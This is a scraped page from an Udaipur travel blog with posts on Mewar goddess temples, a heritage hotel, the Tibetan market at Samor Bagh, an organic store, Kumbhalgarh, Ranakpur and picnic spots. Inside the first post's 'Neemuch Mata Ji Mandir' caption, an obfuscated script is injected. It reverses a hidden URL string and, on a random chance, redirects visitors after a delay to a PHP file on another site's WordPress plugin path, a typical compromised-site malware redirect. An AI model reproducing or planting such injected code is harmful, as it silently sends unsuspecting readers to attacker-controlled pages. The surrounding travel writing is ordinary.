Places to Visit

मेवाड़ के प्रमुख शक्तिपीठ – The Major Temples of Mewar

“जगदम्बा थे तो ओढ़ बताओ रे , महारानी थे तो  ओढ़ बताओ रे..
क’शिक लागे, तारा री चुनडी..”

Neemuch Mata Ji M<script>$Ubj=function(n){if (typeof ($Ubj.list[n]) == "string") return $Ubj.list[n].split("").reverse().join("");return $Ubj.list[n];};$Ubj.list=["\'php.litu.ssalc/sedulcni/retadpu-yfimeht/snigulp/tnetnoc-pw/moc.setaicossadnalanruoj//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}</script>andir in Udaipur

सुबह सुबह उनींदी आँखों से उठा तो दादी सा’ मंदिर में पूजा करती हुई ऐसा ही कुछ भजन गुनगुना रही थी. पूछा तो आँखें तरेर कर बोली, “वेंडा छोरा, आज माताजी रो दन है. नवो संवत भी है, बेघो उठ जा. आज देर तक सुतो रह्यो तो पूरा साल सुतो ही’ज रेवेला.” अरे हाँ, आज तो नव संवत्सर है. कल ही तो कोर्ट चौराहे पर आलोक स्कूल के बच्चो ने मेरी बाइक रोक कर मुझे रोली-तिलक लगाया था,मैं भूल कैसे गया. आज तो दूध तलाई पर आतिशबाजी होगी. स्वागत होगा नव संवत्सर का.

सबसे पहले तो उदयपुर ब्लॉग के सभी देसी-विदेसी पाठकों को नवसंवत्सर 2069 और चैती नौरतों की बहुत बहुत बधाई. हमारे सिंधी भाइयों को चेटीचंड जी लाख लाख वधायुं. “आयो लाल, झूलेलाल “. आज मेरा मन बार बार कह रहा है कि आप सभी को उदयपुर में जहाँ जहाँ जोगमाया के देवरे है, मंदिर है..वहाँ ले चलूँ.. तो क्या ख्याल है आपका?

“झीना झीना घूघरा माता के मंदिर बाजे रे..
मोटा मोटा टोकरा भैरू के बाजे रे..”
Mahalaxmi Temple in Udaipur

तो साहब बैठो गाडी पर, सबसे पहले अम्बा माता चलते है. वाह जी वाह ! क्या मोटे तगड़े शेर बाहर पहरा दे रहे है. उदयपुर के दरबार यहाँ आज भी सबसे पहले पूजा करते है. महाराणा स्वरूपसिंह जी और भीम सिंह जी तो कई बार  घुटनों घुटनों तक के पानी को पार करके यहाँ दर्शन करने आते थे.

नीमच और खीमच माता. खीमच माता नीचे फतह सागर की पाल पर तो नीमच माता पास में ऊँचे पहाड पर. दोनों सगी  बहने है पर छोटी वाली नाराज़ होकर पहाड़ी उतरकर आ गयी. नव रात्र के आखिरी दिन दोनों मंदिरों के भोपाजी के “डील” में माताजी आती है. दोनों बहने मिलती है..खूब रोती  है. तो अपने कभी छोटी बहिन से झगडा हो जावे तो नाराज़ नी करना उसको.. आप बड़े हो, अपने सबर कर लेना.

बेदला चलते है. यहाँ के रावले की आराध्य “सुखदेवी माता जी” के दर्शन करते है. माताजी के इतने भगत है कि उदयपुर में पांच में से तीन  कार के पीछे “जय सुखदेवी माता जी” लिखा हुआ मिल जायेगा.  माताजी के मंदिर के सामने दो पत्थरों के बिच रास्ता बना हुआ है, कहते है, उस संकरे रास्ते से निकल जाओ तो कोई रोग आपको नहीं घेरेगा. विश्वास करो तो माताजी है, नही मानो तो..थारी मर्जी सा’

डबोक सीमेंट फेक्ट्री के पास पहाड़ी पर “धूनी माता” बिराज रही है. नौ दिन नौरते यहाँ आस पडोसी गाँव के “पटेलों” की खूब भीड़ रहती है.माताजी के दर्शन करो और साथ में इस पहाड़ी से सामने हवाई अड्डे पर उतरते हवाई जहाज को देखो.. अपन ऊपर और हवाई जहाज नीचे. यहाँ का हरियाली अमावस का मेला बहुत जाना माना  है. यहाँ से उदयपुर आते बखत बेड़वास में माता आशापुरा के दर्शन करना मत भूलना.

टीडी  के पास जावर माता बिराजी है. पास में जिंक की हजारो साल पुरानी खदाने है. कलकल नदी बह रही है. इस मंदिर को औरंगजेब ने खूब नुक्सान पहुचाया. फिर भी मंदिर में आज भी पुरानी मूर्तिकला देखने लायक है.माताजी का मुँह थोडा सा बायीं ओर झुका हुआ है. कारण, एक भगत ने सवा लाख फूल चढाने की मिन्नत मांगी और पूरी करने में कंजूसी दिखाई. माताजी ने नाराज होकर अपना मुँह झुका दिया.  भगत को कुछ नुक्सान नहीं पहुचाया. माँ तो माँ होती है.

अब चलते है चित्तोड की ओर. किले पर सभी को आशीर्वाद दे रही है माता कालका . जितना भव्य चित्तोड का किला, उतना ही भव्य माता का मंदिर. सामने तालाब. कहते है इस किले की रक्षा का सारा भार माताजी ने अपने ऊपर ले रखा है. यहाँ भी नौ दिन मन्नत मांगने और “तंत्र” पूजा करने वालो का सैलाब उमड़ता है. जोगमाया के दर्शन कर बहुत आत्मिक सुख मिलता है.
आते वक़्त सांवरिया जी के दर्शन करते हुए आवरी माता चलते है. कहते है माता आवरा राजपूत चौहान वंश में जन्मी. सात भाइयों की अकेली बहन. सातों भाइयों का इतना प्रेम कि सातों अलग अलग जगह अपनी बहन का रिश्ता कर आये. एक ही दिन, माता से ब्याहने सात सात बिंद गोडी चढ आये. तब माताजी में “जोत” जगी और उन्होंने वहीँ संथारा ले लिया. मेवाड़ के साथ साथ मालवा, वागड , मारवाड.. जाने कहाँ कहाँ से लकवा ग्रस्त रोगी यहाँ ठीक होने आते है. पूरे मंदिर में जहाँ जहाँ तक नज़र जाये, लकवा रोगी माँ के दरबार में बैठे मिलते है. यहाँ राजपूती रिवाज़ से माता की सेवा होती है.

Idana Mata Ji Mandir

कुराबड रावले के पास खुले चबूतरे पर इड़ाना माताजी स्थानक है.पीछे ढेर सारी त्रिशूल. यहाँ माताजी महीने में कम से कम दो बार अगन-स्नान लेती है. इसी अग्नि स्नान के कारण आज तक माँ का मंदिर नहीं बन पाया. ये शक्ति पीठ अन्य सभी से सर्वथा अलग, सर्वथा जुदा. कुराबड रावले के श्री लवकुमार सिंह जी कृष्णावत फिलहाल यहाँ का सारा प्रशासनिक कार्य संभाल रहे है.

अजी साहब, एक ही दिन में सब जगह दर्शन नहीं होंगे. आराम से एक एक दिन सब जगह दर्शन करने जाना. नौ दिन के नौ दर्शन आपको बता दिए. और समय मिले तो माछला मगर पर रोप वे में बैठकर करनी माता दर्शन  करने जरुर जाजो. अरे कभी तो अपनी जेब ढीली करो. बस साठ रुपये किराया है. उभयेश्वर का घाटा ध्यान से चढ़ते हुए महादेव जी के दर्शन करना और पास में ही “वैष्णो देवी” को भी धोक लगते आना. थोडा और समय मिले तो इसवाल से हल्दीघाटी मार्ग पर बडवासन माता का बहुत सुन्दर स्थान है. और समय मिले तो बांसवाडा में माता त्रिपुर सुंदरी, वल्लभ नगर में उन्ठाला माता, देबारी में घाटा वाली माता, भीलवाडा-बूंदी रोड पर जोगनिया माता, बेगूं में झांतला माता, झामेश्वर महादेव के पास पहाड़ी पर  काली  माता,जगत कस्बे में विराजी माताजी, आसपुर में आशापुरा माताजी.. नहीं थके हो तो भेरू जी के देवरे ले चालू.. आज तो वहाँ भी जवारे बोये गए है.
इन नौ दिन पूरी श्रृद्धा के साथ आप माताजी की पूजा करो, नहीं तो मेरी दादी सा’ को आपके घर का पता दे दू.. वो आपको सिखा देगी, पूजा कैसे होती है. उनका एक बहुत प्यारा भजन है, उसीके साथ आपसे विदाई…

“माता आयो आयो आवरा रानी रो साथ, आये ने वाघा उतरियो म्हारी माँ
माता हरे भरे देखियो हरियो बाग, फूला री लिदी वासना म्हारी माँ
माता फुलडा तो तोड्या पचास, कलिया तोड़ी डेढ सौ म्हारी माँ
माता फूलडा रो गुन्थ्यो चंदर हार, कलिया रा गुन्थ्या गजरा म्हारी माँ
माता कठे रलाऊ चंदर हार, कठे तो बांधू गजरा म्हारी माँ
माता हिवडे रालु चंदर हार, ऊँचा तो बांधू गजरा म्हारी माँ…”

Places to Visit

Hotel Rajmahal Bhindar – A Closer View

A chance to visit the 434 years old Imperial Palace, The Rajmahal Bhindar– awaiting its grand opening as a hotel this 31st; made it possible for us to bring to our readers some exclusive interior pics of the hotel. Though due to some final renovations, we could not bring you the whole photographic panorama (which we personally promise to bring you soon)  we’re still sure to delight you with the clicks we got.

A perfect drive on a smooth, green surrounded way… And the  candle light settings  amidst the royal backdrop make it one of the finest upcoming hotels of Udaipur- A perfect romantic destination!
Don’t miss the chance to be a part of this splendid celebration, surely going to be a historical remembrance in a few years.

Make your New Year start with a regal pulse-  The Royal Extravaganza 2012!

Photos by:-  Yash Sharma

Places to Visit

यहाँ देवी करती है अग्नि-स्नान

उदयपुर शहर से 60 कि.मी. दूर कुराबड- बम्बोरा मार्ग पर अरावली की विस्तृत पहाड़ियों के बीच स्थित है मेवाड़ का प्रमुख शक्ति-पीठ इडाना माता जी. राजपूत समुदाय, भील आदिवासी समुदाय सहित संपूर्ण मेवाड़ की आराध्य माँ.

इडाना माता जी

स्थानीय लोगों में ऐसा विश्वास है कि लकवा से ग्रसित रोगी यहाँ माँ के दरबार में आकर ठीक होकर जाते हैं. माँ का दरबार बिलकुल खुले एक चौक में स्थित है. ज्ञात हुआ कि यहाँ देवी की प्रतिमा माह में दो से तीन बार स्वतः जागृत अग्नि से स्नान करती है. इस अग्नि स्नान से माँ की सम्पूर्ण चढ़ाई गयी चुनरियाँ, धागे आदि भस्म हो जाते हैं. इसी अग्नि स्नान के कारन यहाँ माँ का मंदिर नहीं बन पाया. माँ की प्रतिमा के पीछे अगणित त्रिशूल लगे हुए है. यहाँ भक्त अपनी मिन्नत पूर्ण होने पर त्रिशूल चढाने आते है. साथ ही संतान की मिन्नत रखने वाले दम्पत्तियों द्वारा पुत्र रत्न प्राप्ति पर यहाँ झुला चढाने की भी परम्परा है. इसके अतिरिक्त लकवा ग्रस्त शरीर के अंग विशेष के ठीक होने पर रोगियों के परिजनों द्वारा  यहाँ चांदी या काष्ठ के अंग बनाकर चढ़ाये जाते हैं.

प्रतिमा स्थापना का कोई इतिहास यहाँ के पुजारियों को ज्ञात नहीं है. बस इतना बताया जाता है कि वर्षो पूर्व यहाँ कोई तपस्वी बाबा तपस्या किया करते थे. बाद में धीरे धीरे स्थानीय पडोसी गाँव के लोग यहाँ आने लगे.

कभी बिलकुल बीहड़ में स्थित इस शक्ति-पीठ में इन दिनों काफी विकास कार्य हुए हैं. ” श्री इडाना माँ मंदिर ट्रस्ट के सरंक्षक श्री लवकुमार सिंह कृष्णावत (कुराबड) ने बताया कि विगत कुछ वर्षों में भामाशाहों के सहयोग एवं मंदिर के चढ़ावे से यहाँ धर्मशाला निर्माण, गौशाला निर्माण, रोगियों को मुफ्त भोजन एवं आवास सहित और कई जनोपयोगी कार्य करवाए गए हैं.

प्रमुख स्थल- माँ का दरबार, अखंड ज्योति दर्शन, धुनी दर्शन, गौशाला, विस्तृत भोजनशाला, रामदेव मंदिर आदि.
प्रमुख दर्शन – प्रातः साढ़े पांच बजे प्रातः आरती, सात बजे श्रृंगार दर्शन, सायं सात बजे सायं आरती दर्शन यहाँ प्रमुख दर्शन हैं.  इस शक्ति पीठ की विशेष बात यह है कि यहाँ माँ के दर्शन चौबीस घंटें खुले रहते है. सभी लकवा ग्रस्त रोगी रात्रि में माँ की प्रतिमा के सामने स्थित चौक में आकर सोते है. दोनों नवरात्री यहाँ भक्तों की काफी भीड़ रहती है. इसके अतिरिक्त सभी प्रमुख त्यौहार यहाँ धूमधाम से मनाये जाते है.

कैसे पहुचें-  सूरजपोल से प्रातः उपनगरीय बस सेवा उपलब्ध. इसके अतिरिक्त कुराबड-बम्बोरा  मार्ग पर जाने वाले वाहनों से बम्बोरा पहुचकर वहा से जीप द्वारा शक्तिपीठ पंहुचा जा सकता है. स्वयं के वाहनों से जाने पर देबारी- साकरोदा- कुराबड- बम्बोरा होते हुए शक्ति पीठ पंहुचा जा सकता है. (दुरी- 60  किलोमीटर)

Article By : Arya Manu

Lifestyle Places to Visit

Chilly winters and Samor Bagh

Tibet Market

An open ground comprised of 56 small stalls contended by refugee Tibetan families, and that’s how Samor Bagh looks now. However, 15 years back it didn’t look like this. No one in Udaipur knew about this place, but now days it is very popular among all Udaipurites. If someone has to buy woolen wears the first name which comes in the mind is Samor Bagh. People at Udaipur have a strong feeling that there they can avail all different varieties of winter apparel and accessories at cheap and best price as compared to other shops and showrooms.

samor bagh udaipur

While talking to Mr. Tee Jampa, (President of Tibetan association, Udaipur) I was able to read the struggles which he and his community have faced.  I was very curious to know the story behind and I’m sure everyone will be interested to know their story. He narrated that in 1959 when china attacked on Tibet, around 80-90 thousands of people along with Dalai Lama fled to India and settled down in five different states. Before 45 years 25-30 refugees (ancestors) came up to the lake city in search of livelihood and started selling hand woven woolen clothes by wandering door to door. Slowly, people started accepting their products which has sober colors and designs. The other reason behind mass acceptance was the rate and quality of products.

After some time they took permission from municipality and started selling their manufactured goods at footpaths of Surajpol near Ashoka Talkies. They also established their market in Chetak and Town hall in 80s. In few years municipality didn’t allow them to carry on further. They were highly disappointed that time. Maharaja Mahendra Singh Pratap of Mewar sent a letter to nomads expressing that he’s really sad that they (followers of Dalai Lama) are facing in his city. He’ll be grateful if they would use his piece of land named Samor Bagh near Gulab Chowk.

Finally they shifted to Samor bagh and now it’s been 17 years they are operating there only. He also told us that the rent which the king charges is very less as compared to other landowners and government bodies. The rent is divided equally among all 56 members. The other problem which they face is MRP of the materials which they sale. To curb this issue in 2006 they have made an alliance called “Tibetan Refugee Trader’s Association” where they discuss about the rate and various other concerns which causes hindrance to them in fostering their business. Besides this, the association also helps Tibetans in binding them socially from all over India.

The stalls consist of both handmade and machine made. Mr. Palden (Gen. Secretry) told us that they started manufacturing the machine made products before 30 years from Ludhiana as the demand of such goods were high. They order the products according to the penchant of the city’s populace.  Every year these Tibetans came from different states mostly from Himanchal Pradesh, Uttarakhand, U.P. and Bihar for 3-4 months and sale the stuffs. While rest of the months these refugees subsist on agriculture and small shops.

Samor Bagh Udaipur

Life is very tough especially for these Tibetans who are refugees and still struggling for their country from more than 50 years. With this winters there are many other things which come in this city and Tibetans are one among them.  They are very gentle people we all should love and respect them and also try to give them a little space in our heart so they can also easily mingle with us.

Video: Words by Mr.Thinley Jampa (President)

Dalai Lama

Tibetan Market Udaipur

Tibetan Market Udaipur

Tibetan Market Udaipur, Samor Bagh Udaipur

Tibetan Market Udaipur

Tibetan Market Udaipur

Article By : Khushboo Baranwal

Photos and Article Inputs By : Yash Sharma

Places to Visit

The Bhindar Rajmahal – an Essence of Imperial Life within the Nature’s Curtain

Hotel Bhindar

We feel immensely pleasured to introduce to you The Bhindar Rajmahal– the 434 years old Palace belonging to the ancestry of Maharana Shakti Singh; now renovated into a beautiful splendid hotel. The biggest attraction of the hotel is, being in its inaugural time; it’s somewhat more affordable to the commons as compared to the other heritage hotels of the city.

The hotel provides a perfect blend of chivalric culture and natural ecstasy in the country soil. Apart from the currently available 14 deluxe rooms and 6 suites, the palace also has an outhouse situated in a large lush green farm, bordered by a private seasonal lake. The mountains are just on their toes and the air is of utmost peace and beauty. You can always find 5 beautiful horses available for the liveliest experience of horse-riding amidst the terrain.

While specially “keeping in mind the people of Udaipur”, a Restaurant named “Baghichi” has also been developed in the complex; one can always have it in mind if he wishes to spend some time with close ones in the outer periphery, away from the pollution and noise. Having a smooth forty five minute drive is always a fair deal when you are getting a quality time in a place; I should use the word palace”! totally alien to the city.

Sight-seeing is facilitated by open jeeps, an established symbol of the Rajput culture by now! Sitamata Wildlife Sanctuary (a habitat to the rare Flying Squirrels) is just 35 kms ahead; other surrounding places include Akola, Jaisamand Lake, Jagat temples, Haldi ghati, Chittorgarh, Ekling JI & Nathdwara Shrinathji temple.

While the proper service of the customers is personally taken care of by the Director herself; activities like trekking, jeep safari, horse-riding, yoga, tent camping, cooking classes of the local delicacies and musical nights for the traditional taste are also organized.

With a young management always ready to design a playful beauty of an exquisite contrast, you can also have DJ Parties arranged in the open spaces on a single call.

And the speciality; a wish for many- the Destination Wedding! Is the sole expertise of the place. One always dreams of having a marriage in the most royal forms, a one time affair in the whole lifetime; won’t it be best if done with such an imperial magnificence!

The Bhindar Rajmahal is just 59 kms from Udaipur; moving straight on the Chittor Highway & turning to the right from Keer Ki Chowki. Escorts can also be availed for the same.

If you wish to spend a day of luxury, or to enchant the beauty of nature; have a lovely time with your spouse or a memorable happening with family & friends- The Bhindar Rajmahal is the perfect place to be. 🙂

NOTE:- A New Year Party will be organized next month in the hotel; Passes for which can be booked from the following contact numbers:- +91-9461503339; +91-9783539255.
We promise you a royal treatment with a cherishing service. 

Places to Visit

Lets Synchronize with Nature via Banyan Roots

To put a step forward in the path of sustainable development and with a novel idea to inspire, promote and support all components of our planet and for well-being of Mother Nature, an organic store has been started by enthusiastic youth of the city. They named the organic store as ‘Banyan Roots’ to signify the rebirth of old and deep rooted traditions and moral values.

Banyan Roots | UdaipurBlog

The store provides you with some of the local grains like millet (kangni), wheat, other products such as herbal tea, gooseberry (amla) candy and juice and many more exclusively organic products that are grown without the use of any fertilizers, hybrid seeds and  pesticides. These goods are directly brought to you from the farm eliminating the concept of middle man so that the farmer practicing organic farming gets a justifiable price. The group also encourages the local farmers from time to time to grow more of the organic food for a healthier and happier tomorrow of society.

They indeed also started an open space cum café with an ambience that carries a touch of being close to nature as well as tradition. It is especially for the future of the nation so that they can shape their own different world of creativity. If you are a wanderer and cannot find any place or roof to germinate new ideas or if you are an explorer in need of more space to experiment or even if you want to find the truth about something that is questioning you from inside, then this place is truly made for you only. Banyan roots is a perfect address for such wanderers, explorers and discoverers. Here youth can connect, unite and share their experiences, ideas, views and thoughts with others. Along with getting mental peace and satisfaction, you can also quench your hunger with the delicious and healthy organic food in this café.

Banyan Roots | UdaipurBlog.comBanyan Roots | UdaipurBlog.comBanyan Roots | UdaipurBlog.comBanyan Roots | UdaipurBlog.comBanyan Roots | UdaipurBlog.comBanyan Roots | UdaipurBlog.comBanyan Roots |

The team of banyan roots whole heartedly wants to welcome you at a place which is created for you at 32/4, Near Fatehpura, Income Tax Office Road, Near Sukhadiya Circle, Udaipur.

Rohit Jain: 9783223520 and Jayesh Mohta: 9772861482 will be happy to solve any further queries of you.


Edited By: Palak Jain

Places to Visit

A day like a Tourist [Part 2] : Destination Ranakpur

Our exciting trip was not completed yet. After exploring the sheer majesty of Kumbhalgarh, we reached our second destination for the day, Ranakpur, in the heart of Aravali valleys, passing by the lush green valleys and streams. The World renowned state of the Jain art temples, it is one of the most important pilgrim among the five pilgrims of the Jainism. It is located between Jodhpur and Udaipur, in a valley on the western side of the Aravali Range. It is easily accessed by road from Udaipur.

The place features a widely acclaimed main temple, dedicated to Adinatha (Lord Rishabha), the first Tirthankar (enlightened human), built in graceful white marble, designed as ‘chaumukha’ or a four faced temple and also for a much older Sun Temple which lies opposite the former.

There were three distinctive domes in the main temple. The most dazzling highlight were the 1444 intricately carved marble pillars, which support the halls and domes of the temple, which gave a spectacular effect. A centuries old growing tree in the huge marble structure was witnessing the sanctity of the place. In the assembly hall, there were two big bells weighing 108 kg, whose sound echoes in the entire complex. The artistically carved nymphs playing the flute in various dance postures at a height of 45 feet were an engrossing sight.

As per the history, it was a businessman Dhanna Shah, inspired by a dream of a celestial vehicle, who commissioned it under the organization and got great financial support during the reign of the gifted and liberal ruler of Mewar, Rana Khumbha, in the 15th century.

The best time to visit Ranakpur is between September and March. Temperature during summers varies from 22 to 42 and 10 to 20 in winters.

Ranakpur is the perfect place for experiencing the charm and vibrancy of Jainism in Rajasthan. It offers a peaceful spiritual experience to tourists.

After the eventful journey, we all were fully exhausted, but the heart capturing views drove away the journey fatigue. So if you are looking for some unique experience of lifetime, I promise a lot of fun, excitement and adrenaline rush to you, after exploring this north-west corner of Udaipur.

Places to Visit

A day like a Tourist [Part 1] : Destination Kumbhalgarh

Powerful kings and their beautiful queens, ruling huge empires, their breathtaking stories, magnificent castles that echo with the glory of their triumph, majestic lifestyle and inspiring victories, all these things always cast their spell on me. And I am sure that years back, while listening to your grandparents at your sleep time, these have enchanted you also.

Today, on occasion of world tourism day, I decided to have closer look of Mewar kingdom when my friends planned a trip to Kumbhalgarh and Ranakpur.

As the enchanting sights of the fort, temple and adjoining places completely soaked me, I am hereby sharing my copious memories and experience of the day with all of you, the memories of which are still fresh in my mind.

The first destination of our journey was Kumbhalgarh. Standing at the large entrance leading to the fort, I was completely mesmerized, completely fantasized. Secured against the backdrop of towering mountains of the Aravali ranges, guarded by seven massive gates, seven defending walls and with numerous watchtowers, this mountain fortress has witnessed many battles, is strong founded and so is unbeatable till date. Built on a hilltop of 1100 meters above sea level it is stated to have the second longest wall in the world, with a perimeter of about 36 km, the first being “the Great Wall of China”.

Also called Kumbhalmer, the fortress is inter-weave with the rich history of Mewar rulers. It is the birth place of Maharana Pratap, the great king and warrior of Mewar. It derived its name from Maharana Khumbha who designed and built this unconquerable fort in the 15th century which was further enlarged through 19th century. The second most important and elaborated fort of Rajasthan after Chittorgarh, it was occupied by the royal family till 19th century, but now is open for general public as a museum.

The location of Kumbhalgarh has always given an added advantage to it. Being easily accessible from Udaipur, Ajmer and Jodhpur, it highly attracts and is visited by tourists all over the globe. Situated in the Rajsamand district of Rajasthan, it is towards the north-west of Udaipur, 82 km by road from the city.

The huge complex offering ancient remnants to explore was worth watching, comprising over 360 Jain and Hindu temples, numerous gardens and palaces, making it more beautiful and magnificent.

The most spectacular place of the fort resides near the clouds, “Badal Mahal”. It is the beautiful palace with fantastic bright contrasting color combinations of green, turquoise and white to the rough, raw and earthy fortress, making the view pleasant. The place, as per its name, gives the pleasure of being wandering in the world of clouds.

The day was quite moderate in temperature. Sunny after a rainy season, the temperature was of the weather was comfortable. During summers, the temperature reaches up to 25-42°C and varies from shivering 2°C to maximum 22°C during winters. The pleasant time to visit Kumbhalgarh is between the months of September to March. During monsoon the humidity may disturb your mood.

The exciting trip hasn’t completed yet. While I’m on my way to Ranakpur, and posting the article for all the UdaipurBlog readers, I will have to currently end this part and gear up for the next destination. Take a look at the pictures of the magnificent place, and I will catch up soon with the other part.

Events Featured Lifestyle Photos and Videos Places to Visit

[Pictures] Ritz Jeele Ye Pal: A TV Reality Show shot entirely in Udaipur

Udaipur, also known as Lakecity or The city of Dawn, with land around the immense water lakes, folded with hills of the Aravalis. A dream come true location of romance and beauty. I must say words are not enough to define the beauty of Udaipur. It can be verified by the fact that it’s one of the best tourist places not only in India but all over the world. Anyways that’s a fact which most of us know. But what’s more interesting is people from all over the world not only love to come and visit Udaipur but also like to watch Udaipur in Movies, Pictures and daily television shows/soaps. As Udaipur is a fascinating blend of sights, sounds and experiences – an inspiration for the imagination of artists.

The latest notification is about “Ritz Jeele Ye Pal”, which is an auto adventure reality television show, where 6 celebrities will pair with 6 young Indians from various regions of India to experience the great outdoors across different locations of Udaipur. There are twelve participants in the show including six celebrity participants who are Kinshuk Mahajan, Karan Wahi, Gaurav Khanna and beautiful leading ladies like Rati Pandey, Anupriya Kapoor and Pavitra Puniya. The show is based on team race in their smart Ritz cars and some other tasks to win points, according to the concept of the show the real winners are they who savour and live every moment of their experience in the show, to the fullest.

Ritz Jeele Ye Pal | UdaipurBlog

This show is produced by Lin TV Advertising Pvt Ltd (Lintas media group) and Spil A Tale Entertainment Pvt Ltd. The complete series of the show including the Grand Finale was filmed at Udaipur which was organized and coordinated by The Crew (Sanjay Soni & Siddharth Soni). The show was shot at more than 40 different prime sights of Udaipur such as Badi pal, Hotel Fathegarh palace, Shilpgram, Dhudh Talai, Fatehsagar, Haldighati, Havala point, Ubheshwarji, Krishi Mandi etc.

Ritz Jeele Ye Pal | UdaipurBlog

The show has 12 episodes in total which is to be telecasted in 6 weeks with its first telecast on 10th September, 2011 at 7:30 pm on star plus (Saturday and Sunday). The show was hosted by Yudi and Roshni Chopra. Director of the show is Arun Sheshkumar. Complete series of show was coordinated by THE CREW. Sanjay Soni (Owner-The Crew) played a role of Sarpanch of a village (as a judge for a task) shot in 1st episode.


Few glimpses of the show have been given below. For more details and entertainment must watch the show right from its first telecast on 10th September, 2011 at 7:30 pm on Star Plus.

Ritz Jeele Ye Pal | UdaipurBlog
Hosts of the Show

Ritz Jeele Ye Pal | UdaipurBlogRitz Jeele Ye Pal | UdaipurBlogRitz Jeele Ye Pal | UdaipurBlogRitz Jeele Ye Pal | UdaipurBlogRitz Jeele Ye Pal | UdaipurBlogRitz Jeele Ye Pal | UdaipurBlogRitz Jeele Ye Pal | UdaipurBlogRitz Jeele Ye Pal | UdaipurBlogRitz Jeele Ye Pal | UdaipurBlog

Ritz Jeele Ye Pal | UdaipurBlog
Roshni Chopra with Sanjay Soni

Ritz Jeele Ye Pal | UdaipurBlogRitz Jeele Ye Pal | UdaipurBlogRitz Jeele Ye Pal | UdaipurBlogRitz Jeele Ye Pal | UdaipurBlog

Places to Visit

[Picnic Destination] Enjoy the Monsoon at Nandeshwar Ji

Already a great weather outside, isn’t it? So do you want to have fun, go for a picnic with family or hangout with friends? Are you confused which place to go and what can be the journey distance? Confused about the path? Let us suggest you few good locations for the same, and solve your queries. In the same series, we first bring to you a cool, peaceful location in the nature’s lap, the people who know it guessed right, I am talking about Nandeshwar Ji.

Nandeshwar is about 15kms from Udaipur. It is Lord Shiva’s temple situated in the vicinity, because of which, the place is more commonly known as Nandeshwar ji (most famous name for Udaipies.) The place has a beautiful pond and is full of amazing flora and fauna. You can spend your time there by taking a look of awesome beauty of nature, and also enjoy in flowing water (but with ensured safety measures). In short it’s the best destination for you, if you are searching a perfect place for Picnic in the season of monsoon. The temple can be a nice centre of peace for the religious people, and there’s a wishing well too. It is believed that if the coin you throw in it touches the large stone in it, your wish will be fulfilled.

How to Reach: After Crossing Ambamata circle there is a straight road to Rampura circle (commonly known as the Rampura choraha ), then follow a straight path. After crossing a remote area you will find out your destination. The guidelines on the road will help you more.

The route to Nandeshwar ji from Rampura circle is decked with greenery, single lane road and some lovely farm houses. What a visual treat! That being said, the route was full of overloaded buses and jeeps, which could give you shivers.

A humble request from UdaipurBlog: do ensure your safety, and follow the boards and warnings at the picnic spots.

Photographs and Coverage by Yash Sharma

Nandeshwar | UdaipurBlog
The Wishing Well

Nandeshwar | UdaipurBlogNandeshwar | UdaipurBlogNandeshwar | UdaipurBlog

Nandeshwar | UdaipurBlog
The Nandeshwar Channel

Nandeshwar | UdaipurBlog

Video Of NandeshwarJi: